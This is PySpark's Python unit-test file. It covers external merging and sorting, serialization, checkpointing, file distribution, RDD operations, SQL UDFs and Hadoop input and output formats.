# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from fileinput import input
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
from platform import python_implementation
if sys.version_info[:2] <= (2, 6):
import unittest2 as unittest
else:
import unittest
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, ExternalSorter
from pyspark.sql import SQLContext, IntegerType, Row
from pyspark import shuffle
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class TestMerger(unittest.TestCase):
def setUp(self):
self.N = 1 << 16
self.l = [i for i in xrange(self.N)]
self.data = zip(self.l, self.l)
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
def test_in_memory(self):
m = InMemoryMerger(self.agg)
m.mergeValues(self.data)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = InMemoryMerger(self.agg)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 10)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda (k, v): (k, [str(v)]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m._recursive_merged_items(0)),
self.N * 10)
m._cleanup()
class TestSorter(unittest.TestCase):
def test_in_memory_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = range(10240)
random.shuffle(l)
rdd = sc.parallelize(l, 10)
self.assertEquals(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from cPickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEquals(p1, p2)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEquals(out1, out2)
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name, batchSize=2)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class TestCheckpoint(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
PySparkTestCase.tearDown(self)
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEquals([1, 2, 3, 4], recovered.collect())
class TestAddFile(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
log4j = self.sc._jvm.org.apache.log4j
old_level = log4j.LogManager.getRootLogger().getLevel()
log4j.LogManager.getRootLogger().setLevel(log4j.Level.FATAL)
def func(x):
from userlibrary import UserClass
return UserClass().hello()
self.assertRaises(Exception,
self.sc.parallelize(range(2)).map(func).first)
log4j.LogManager.getRootLogger().setLevel(old_level)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEquals("Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1-py2.7.egg")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
class TestRDDFunctions(PySparkTestCase):
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.sc.stop()
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
self.sc = SparkContext("local")
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda (x, y): x + y).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize(["Hello", "World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual("Hello World!", x.strip())
self.assertEqual("Hello World!", y.strip())
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
def testAggregateByKey(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEquals([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 100000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 270MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEquals(N, m)
def test_large_closure(self):
N = 1000000
data = [float(i) for i in xrange(N)]
m = self.sc.parallelize(range(1), 1).map(lambda x: len(data)).sum()
self.assertEquals(N, m)
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEquals(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(range(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.04) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.5))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals([4], rdd.histogram([0, 10])[1])
self.assertEquals([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEquals([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEquals([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEquals([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEquals(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEquals(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEquals((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEquals([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
# mixed RDD
rdd = self.sc.parallelize([1, 4, "ab", "ac", "b"], 2)
self.assertEquals([1, 1], rdd.histogram([0, 4, 10])[1])
self.assertEquals([2, 1], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals(([1, "b"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEquals(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEquals(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEquals(rdd.getNumPartitions(), 10)
self.assertEquals(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEquals(result.getNumPartitions(), 5)
self.assertEquals(result.count(), 3)
class TestSQL(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.sqlCtx = SQLContext(self.sc)
def test_udf(self):
self.sqlCtx.registerFunction("twoArgs", lambda x, y: len(x) + y, IntegerType())
[row] = self.sqlCtx.sql("SELECT twoArgs('test', 1)").collect()
self.assertEqual(row[0], 5)
def test_broadcast_in_udf(self):
bar = {"a": "aa", "b": "bb", "c": "abc"}
foo = self.sc.broadcast(bar)
self.sqlCtx.registerFunction("MYUDF", lambda x: foo.value[x] if x else '')
[res] = self.sqlCtx.sql("SELECT MYUDF('c')").collect()
self.assertEqual("abc", res[0])
[res] = self.sqlCtx.sql("SELECT MYUDF('')").collect()
self.assertEqual("", res[0])
def test_basic_functions(self):
rdd = self.sc.parallelize(['{"foo":"bar"}', '{"foo":"baz"}'])
srdd = self.sqlCtx.jsonRDD(rdd)
srdd.count()
srdd.collect()
srdd.schemaString()
srdd.schema()
# cache and checkpoint
self.assertFalse(srdd.is_cached)
srdd.persist()
srdd.unpersist()
srdd.cache()
self.assertTrue(srdd.is_cached)
self.assertFalse(srdd.isCheckpointed())
self.assertEqual(None, srdd.getCheckpointFile())
srdd = srdd.coalesce(2, True)
srdd = srdd.repartition(3)
srdd = srdd.distinct()
srdd.intersection(srdd)
self.assertEqual(2, srdd.count())
srdd.registerTempTable("temp")
srdd = self.sqlCtx.sql("select foo from temp")
srdd.count()
srdd.collect()
def test_distinct(self):
rdd = self.sc.parallelize(['{"a": 1}', '{"b": 2}', '{"c": 3}']*10, 10)
srdd = self.sqlCtx.jsonRDD(rdd)
self.assertEquals(srdd.getNumPartitions(), 10)
self.assertEquals(srdd.distinct().count(), 3)
result = srdd.distinct(5)
self.assertEquals(result.getNumPartitions(), 5)
self.assertEquals(result.count(), 3)
def test_apply_schema_to_row(self):
srdd = self.sqlCtx.jsonRDD(self.sc.parallelize(["""{"a":2}"""]))
srdd2 = self.sqlCtx.applySchema(srdd.map(lambda x: x), srdd.schema())
self.assertEqual(srdd.collect(), srdd2.collect())
rdd = self.sc.parallelize(range(10)).map(lambda x: Row(a=x))
srdd3 = self.sqlCtx.applySchema(rdd, srdd.schema())
self.assertEqual(10, srdd3.count())
class TestIO(PySparkTestCase):
def test_stdout_redirection(self):
import subprocess
def func(x):
subprocess.check_call('ls', shell=True)
self.sc.parallelize([1]).foreach(func)
class TestInputFormat(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
self.sc._jvm.WriteInputFormatTestDataGenerator.generateData(self.tempdir.name, self.sc._jsc)
def tearDown(self):
PySparkTestCase.tearDown(self)
shutil.rmtree(self.tempdir.name)
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.assertEqual(maps, em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
ec = (u'1',
{u'__class__': u'org.apache.spark.api.python.TestWritable',
u'double': 54.0, u'int': 123, u'str': u'test1'})
self.assertEqual(clazz[0], ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
batchSize=1).collect())
self.assertEqual(unbatched_clazz[0], ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
oldconf = {"mapred.input.dir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
newconf = {"mapred.input.dir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
class TestOutputFormat(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
PySparkTestCase.tearDown(self)
shutil.rmtree(self.tempdir.name, ignore_errors=True)
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
